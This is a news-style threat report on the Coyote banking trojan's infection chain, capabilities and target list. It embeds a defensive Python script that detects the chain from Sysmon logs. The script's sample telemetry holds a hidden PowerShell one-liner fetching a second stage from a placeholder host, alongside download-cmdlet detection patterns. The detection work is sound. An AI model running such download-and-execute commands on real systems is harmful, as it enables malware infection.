
In a concerning development, cybersecurity experts have identified a significant expansion in the operations of the Coyote banking malware. The malware now targets over 1,000 websites and 73 financial institutions, primarily affecting Brazilian Windows users. This escalation underscores the evolving tactics of cybercriminals and the increasing sophistication of malware threats.
Evolution of Coyote Malware
Initially documented by Kaspersky in early 2024, Coyote was recognized for its capability to harvest sensitive information from more than 70 financial applications. The initial attack vector involved a Squirrel installer executable that triggered a Node.js application compiled with Electron, which subsequently ran a Nim-based loader to execute the malicious Coyote payload.
Recent analyses by Fortinet’s FortiGuard Labs have revealed a shift in Coyote’s infection methodology. The latest campaigns commence with a Windows Shortcut (LNK) file that executes a PowerShell command to retrieve a subsequent payload from a remote server. This payload is another PowerShell script that launches a loader responsible for executing an interim payload. That interim payload, injected by the loader, leverages Donut, a tool designed to decrypt and execute the final Microsoft Intermediate Language (MSIL) payloads. The decrypted MSIL file establishes persistence by modifying the Windows registry, ensuring the malware’s continued presence on the infected system.
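The chain above gives a defender two observable stages on the same host: PowerShell launched from an Explorer-handled shortcut that pulls something from the web, then a registry autorun write a short while later. The following script is an added example (not code from the article or from Fortinet) that correlates those two stages over Sysmon-style telemetry. The Sysmon field names (EventID 1 process create, EventID 13 registry value set, Image, ParentImage, CommandLine, TargetObject) are real; the download-cmdlet keywords, the choice of Run/RunOnce as the persistence location, the 10-minute window and the sample events are all assumptions made for this example, since the article only says the MSIL payload "modifies the Windows registry".

```python
"""Correlate LNK-launched PowerShell downloads with registry autorun writes.

Sysmon field names are real; keyword heuristics, the Run/RunOnce assumption,
the correlation window and the sample telemetry are constructed for this example.
"""
import re
from datetime import datetime, timedelta

# Assumed indicators of a PowerShell one-liner that fetches a remote payload.
DOWNLOAD_PATTERNS = re.compile(
    r"(Invoke-WebRequest|iwr\b|DownloadString|DownloadFile|Net\.WebClient|Start-BitsTransfer)",
    re.IGNORECASE,
)
# Assumed autorun locations; the article does not name the key Coyote modifies.
AUTORUN_PATTERNS = re.compile(r"\\CurrentVersion\\(Run|RunOnce)\\", re.IGNORECASE)
# Assumed: persistence within 10 minutes of the first stage is "the same chain".
CORRELATION_WINDOW = timedelta(minutes=10)


def is_lnk_spawned_download(event: dict) -> bool:
    """Process-create event: PowerShell under explorer.exe with a download verb in its command line."""
    if event.get("EventID") != 1:
        return False
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    cmd = event.get("CommandLine", "")
    return (
        image.endswith(("\\powershell.exe", "\\pwsh.exe"))
        and parent.endswith("\\explorer.exe")
        and DOWNLOAD_PATTERNS.search(cmd) is not None
    )


def is_autorun_write(event: dict) -> bool:
    """Registry value-set event whose target lies under a Run/RunOnce key."""
    return (
        event.get("EventID") == 13
        and AUTORUN_PATTERNS.search(event.get("TargetObject", "")) is not None
    )


def correlate(events: list) -> list:
    """Return one alert per host where stage 1 is followed by an autorun write inside the window."""
    alerts = []
    ordered = sorted(events, key=lambda e: e["UtcTime"])  # ISO timestamps sort lexically
    recent_downloads = {}  # host -> time of last suspicious PowerShell launch
    for ev in ordered:
        ts = datetime.fromisoformat(ev["UtcTime"])
        host = ev["Computer"]
        if is_lnk_spawned_download(ev):
            recent_downloads[host] = ts
        elif is_autorun_write(ev):
            first = recent_downloads.get(host)
            if first is not None and ts - first <= CORRELATION_WINDOW:
                alerts.append({
                    "host": host,
                    "stage1": first.isoformat(),
                    "persistence": ev["TargetObject"],
                })
                del recent_downloads[host]  # one alert per chain
    return alerts


# Constructed sample telemetry (no real IoCs): WS-01 shows both stages,
# WS-02 only a benign Explorer-launched script, WS-03 only an installer's Run key.
SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": "2025-03-01T10:00:00", "Computer": "WS-01",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell -w hidden -c \"iwr http://example.invalid/stage2.ps1 -o $env:TEMP\\s.ps1\""},
    {"EventID": 13, "UtcTime": "2025-03-01T10:03:20", "Computer": "WS-01",
     "Image": "C:\\Users\\user\\AppData\\Local\\Temp\\loader.exe",
     "TargetObject": "HKU\\S-1-5-21-EXAMPLE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater"},
    {"EventID": 1, "UtcTime": "2025-03-01T10:05:00", "Computer": "WS-02",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell -File C:\\scripts\\cleanup.ps1"},
    {"EventID": 13, "UtcTime": "2025-03-01T10:06:00", "Computer": "WS-03",
     "Image": "C:\\Program Files\\Vendor\\setup.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\VendorAgent"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Run on the constructed sample, only WS-01 produces an alert: the benign Explorer-launched script on WS-02 has no download verb, and the installer on WS-03 writes a Run key without a preceding suspicious PowerShell launch. Either stage alone is noisy in a real estate; requiring both on one host within a short window is what makes the rule worth paging on.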
Expanded Target List
One of the most alarming developments is the significant expansion of Coyote’s target list. The malware now encompasses 1,030 websites and 73 financial agents, including prominent platforms such as mercadobitcoin.com.br, bitcointrade.com.br, and foxbit.com.br. This broadened scope indicates the attackers’ intent to cast a wider net, increasing the potential impact on unsuspecting users.
Malicious Capabilities
Once deployed, the Coyote Banking Trojan can carry out various malicious activities, including keylogging, capturing screenshots, and displaying phishing overlays to steal sensitive credentials. The malware gathers basic system information and the list of installed antivirus products on the host, encoding this data in Base64 and exfiltrating it to a remote server. It also performs various checks to evade detection by sandboxes and virtual environments.
If a victim attempts to access any of the targeted sites, the malware communicates with an attacker-controlled server to determine the next course of action. Possible actions include capturing a screenshot, serving overlays, activating a keylogger, and manipulating display settings.
Implications and Recommendations
The complex and multi-staged infection process of Coyote poses a significant threat to financial cybersecurity. The use of LNK files for initial access, followed by the deployment of various malicious files, highlights the sophisticated tactics employed by cybercriminals.
Given the potential for Coyote to expand beyond its initial targets, it is imperative for individuals and organizations to implement robust cybersecurity measures. This includes regularly updating software and systems, employing comprehensive security solutions, and educating users about the risks associated with opening unsolicited files or clicking on suspicious links.
Conclusion
As cyber threats continue to evolve, staying informed and vigilant is crucial in safeguarding sensitive information and maintaining the integrity of financial systems. The Coyote malware’s rapid evolution and expanding target list serve as a stark reminder of the persistent and adaptive nature of cyber threats.